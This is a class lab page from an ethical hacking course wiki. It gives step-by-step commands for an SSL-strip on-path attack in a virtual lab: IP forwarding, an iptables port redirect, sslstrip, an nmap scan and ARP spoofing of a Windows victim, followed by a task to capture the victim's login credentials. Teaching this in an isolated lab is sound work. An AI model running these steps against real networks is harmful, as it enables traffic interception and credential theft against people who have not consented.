Class 3 Lab 3 ‐ SSL Strip - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki
Task 1: Become the On-Path Attacker
Step 1
- Make sure the Kali Windows and pfSense VMs are running.
Step 2
- Enable packet forwarding in the Kali Linux machine.
Step 3
- In the terminal, type echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 4
- Redirect traffic from port 80 to port 8080.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Step 5
- In the Kali machine, set SSLStrip to listen to port 8080 (SSLStrip was introduced in EH-03).
sslstrip -l 8080
Step 6
- Initiate an On-Path Attack on the Windows machine.
route –n
nmap -Pn [ip address with cidr]
arpspoof -i eth0 -t [Windows IP] [Gateway IP]
Task 2: Capture the Victim’s Credentials
Step 1
Step 2
- From Kali, start capturing network packets and then complete the login process from the Windows machine.
Step 3
- Verify that the victim’s credentials were captured.